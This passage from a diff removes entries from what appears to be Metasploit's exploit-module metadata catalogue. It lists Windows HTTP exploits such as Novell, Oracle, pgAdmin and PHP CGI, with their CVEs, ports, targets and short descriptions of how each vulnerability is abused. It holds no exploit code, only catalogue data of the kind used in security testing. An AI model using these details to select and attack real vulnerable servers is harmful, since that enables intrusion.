true, - "ref_name": "windows/http/northstar_c2_xss_to_agent_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "event-dependent" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_imanager_upload": { - "name": "Novell iManager getMultiPartParameters Arbitrary File Upload", - "fullname": "exploit/windows/http/novell_imanager_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-10-01", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager", - "references": [ - "OSVDB-68320", - "ZDI-10-190", - "URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/novell_imanager_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_imanager_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_mdm_lfi": { - "name": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", - "fullname": "exploit/windows/http/novell_mdm_lfi", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-03-13", - "type": "exploit", - "author": [ - "steponequit", - "Andrea Micalizzi (aka rgod)" - ], - "description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.", - "references": [ - "CVE-2013-1081", - "OSVDB-91119", - "ZDI-13-087", - "URL-http://www.novell.com/support/kb/doc.php?id=7011895" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Novell Zenworks Mobile Device Management on Windows" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/novell_mdm_lfi.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_mdm_lfi", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/novell_messenger_acceptlang": { - "name": "Novell Messenger Server 2.0 Accept-Language Overflow", - "fullname": "exploit/windows/http/novell_messenger_acceptlang", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.", - "references": [ - "CVE-2006-0992", - "OSVDB-24617", - "BID-17503" - ], - "platform": "Windows", - "arch": "", - "rport": 8300, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Groupwise Messenger DClient.dll v10510.37" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb", - "is_install_path": true, - "ref_name": "windows/http/novell_messenger_acceptlang", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/nowsms": { - "name": "Now SMS/MMS Gateway Buffer Overflow", - "fullname": "exploit/windows/http/nowsms", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-0871", - "OSVDB-42953", - "BID-27896" - ], - "platform": "Windows", - "arch": "", - "rport": 8800, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Now SMS/MMS Gateway v2007.06.27" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/nowsms.rb", - "is_install_path": true, - "ref_name": "windows/http/nowsms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/nscp_authenticated_rce": { - "name": "NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution", - "fullname": "exploit/windows/http/nscp_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-20", - "type": "exploit", - "author": [ - "kindredsec", - "Yann Castel (yann.castel " - ], - "description": "This module allows an attacker with knowledge of the admin password of NSClient++\n to start a privilege shell.\n For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n should be enabled.", - "references": [ - "EDB-48360" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/nscp_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oats_weblogic_console": { - "name": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", - "fullname": "exploit/windows/http/oats_weblogic_console", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-03-13", - "type": "exploit", - "author": [ - "Steven Seeley", - "sinn3r " - ], - "description": "This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.", - "references": [], - "platform": "Java", - "arch": "java", - "rport": 8088, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "WebLogic Server Administration Console 12 or prior" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oats_weblogic_console.rb", - "is_install_path": true, - "ref_name": "windows/http/oats_weblogic_console", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/octopusdeploy_deploy": { - "name": "Octopus Deploy Authenticated Code Execution", - "fullname": "exploit/windows/http/octopusdeploy_deploy", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "James Otten " - ], - "description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.", - "references": [ - "URL-https://octopus.com" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb", - "is_install_path": true, - "ref_name": "windows/http/octopusdeploy_deploy", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle9i_xdb_pass": { - "name": "Oracle 9i XDB HTTP PASS Overflow (win32)", - "fullname": "exploit/windows/http/oracle9i_xdb_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle9i_xdb_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle_beehive_evaluation": { - "name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", - "fullname": "exploit/windows/http/oracle_beehive_evaluation", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-09", - "type": "exploit", - "author": [ - "1c239c43f521145fa8385d64a9c32243", - "mr_me ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.", - "references": [ - "CVE-2010-4417", - "ZDI-11-020", - "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" - ], - "platform": "Windows", - "arch": "", - "rport": 7777, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Beehive 2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_beehive_evaluation", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_beehive_prepareaudiotoplay": { - "name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", - "fullname": "exploit/windows/http/oracle_beehive_prepareaudiotoplay", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-11-10", - "type": "exploit", - "author": [ - "mr_me ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. Authentication is not\n required to exploit this vulnerability.", - "references": [ - "ZDI-15-550", - "URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" - ], - "platform": "Windows", - "arch": "", - "rport": 7777, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Beehive 2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_beehive_prepareaudiotoplay", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_btm_writetofile": { - "name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution", - "fullname": "exploit/windows/http/oracle_btm_writetofile", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-07", - "type": "exploit", - "author": [ - "rgod ", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows to upload the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.", - "references": [ - "OSVDB-85087", - "BID-54839", - "EDB-20318" - ], - "platform": "Java,Windows", - "arch": "", - "rport": 7001, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", - "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_btm_writetofile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_endeca_exec": { - "name": "Oracle Endeca Server Remote Command Execution", - "fullname": "exploit/windows/http/oracle_endeca_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-07-16", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).", - "references": [ - "CVE-2013-3763", - "BID-61217", - "OSVDB-95269", - "ZDI-13-190", - "URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 7770, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/oracle_endeca_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_endeca_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle_event_processing_upload": { - "name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload", - "fullname": "exploit/windows/http/oracle_event_processing_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-04-21", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.", - "references": [ - "CVE-2014-2424", - "ZDI-14-106", - "BID-66871", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 9002, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_event_processing_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/osb_uname_jlist": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "exploit/windows/http/osb_uname_jlist", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php. In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0", - "references": [ - "CVE-2010-0904", - "OSVDB-66338", - "ZDI-10-118" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/http/osb_uname_jlist.rb", - "is_install_path": true, - "ref_name": "windows/http/osb_uname_jlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/peercast_url": { - "name": "PeerCast URL Handling Buffer Overflow", - "fullname": "exploit/windows/http/peercast_url", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", - "references": [ - "CVE-2006-1148", - "OSVDB-23777", - "BID-17040" - ], - "platform": "Windows", - "arch": "", - "rport": 7144, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English SP0-SP4", - "Windows 2003 English SP0-SP1", - "Windows XP English SP0/SP1", - "Windows XP English SP0/SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/peercast_url.rb", - "is_install_path": true, - "ref_name": "windows/http/peercast_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/pgadmin_binary_path_api": { - "name": "pgAdmin Binary Path API RCE", - "fullname": "exploit/windows/http/pgadmin_binary_path_api", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-03-28", - "type": "exploit", - "author": [ - "M.Selim Karahan", - "Mustafa Mutlu", - "Ayoub Mokhtar" - ], - "description": "pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)\n vulnerability through the validate binary path API. This vulnerability\n allows attackers to execute arbitrary code on the server hosting PGAdmin,\n posing a severe risk to the database management system's integrity and the security of the underlying data.\n\n Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.", - "references": [ - "CVE-2024-3116", - "URL-https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/", - "URL-https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2025-04-11 15:55:46 +0000", - "path": "/modules/exploits/windows/http/pgadmin_binary_path_api.rb", - "is_install_path": true, - "ref_name": "windows/http/pgadmin_binary_path_api", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/php_apache_request_headers_bof": { - "name": "PHP apache_request_headers Function Buffer Overflow", - "fullname": "exploit/windows/http/php_apache_request_headers_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-08", - "type": "exploit", - "author": [ - "Vincent Danen", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".", - "references": [ - "CVE-2012-2329", - "OSVDB-82215", - "BID-53455", - "URL-http://www.php.net/archive/2012.php#id2012-05-08-1", - "URL-http://www.php.net/ChangeLog-5.php#5.4.3", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/php_apache_request_headers_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": { - "name": "PHP CGI Argument Injection Remote Code Execution", - "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-06", - "type": "exploit", - "author": [ - "Orange Tsai", - "watchTowr", - "sfewer-r7" - ], - "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.", - "references": [ - "CVE-2024-4577", - "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/", - "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/" - ], - "platform": "PHP,Windows", - "arch": "php, cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows PHP", - "Windows Command" - ], - "mod_time": "2024-06-13 15:10:14 +0000", - "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb", - "is_install_path": true, - "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/plesk_mylittleadmin_viewstate": { - "name": "Plesk/myLittleAdmin ViewState .NET Deserialization", - "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-05-15", - "type": "exploit", - "author": [ - "Spencer McIntyre", - "wvu " - ], - "description": "This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.", - "references": [ - "CVE-2020-13166", - "URL-https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", - "URL-https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8401, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-03-31 12:07:57 +0000", - "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/plesk_mylittleadmin_viewstate", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/plex_unpickle_dict_rce": { - "name": "Plex Unpickle Dict Windows RCE", - "fullname": "exploit/windows/http/plex_unpickle_dict_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-07", - "type": "exploit", - "author": [ - "h00die", - "Chris Lyne" - ], - "description": "This module exploits an authenticated Python unsafe pickle.load of a Dict file. An authenticated attacker\n can create a photo library and add arbitrary files to it. After setting the Windows only Plex variable\n LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes\n an RCE as the user who started Plex.\n Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab\n the X-Plex-Token header. See info -d for additional details.\n If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required\n as subsuquent writes will make Dict-1, and not execute.", - "references": [ - "URL-https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py", - "URL-https://www.tenable.com/security/research/tra-2020-32", - "URL-http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/", - "URL-https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819", - "CVE-2020-5741" - ], - "platform": "Python", - "arch": "python", - "rport": 32400, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/plex_unpickle_dict_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/plex_unpickle_dict_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/privatewire_gateway": { - "name": "Private Wire Gateway Buffer Overflow", - "fullname": "exploit/windows/http/privatewire_gateway", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-26", - "type": "exploit", - "author": [ - "Michael Thumann " - ], - "description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.", - "references": [ - "CVE-2006-3252", - "OSVDB-26861", - "BID-18647" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 English SP0", - "Windows 2000 English SP1", - "Windows 2000 English SP2", - "Windows 2000 English SP3", - "Windows 2000 English SP4", - "Windows 2003 English SP0/SP1", - "Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/privatewire_gateway.rb", - "is_install_path": true, - "ref_name": "windows/http/privatewire_gateway", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/prtg_authenticated_rce": { - "name": "PRTG Network Monitor Authenticated RCE", - "fullname": "exploit/windows/http/prtg_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-06-25", - "type": "exploit", - "author": [ - "Josh Berry ", - "Julien Bedel " - ], - "description": "Notifications can be created by an authenticated user and can execute scripts when triggered.\n Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.\n The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.\n It may require a few tries to get a shell because notifications are queued up on the server.\n This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.", - "references": [ - "CVE-2018-9276", - "URL-https://www.codewatch.org/blog/?p=453" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/prtg_authenticated_rce.rb", - "is_install_path": true, - 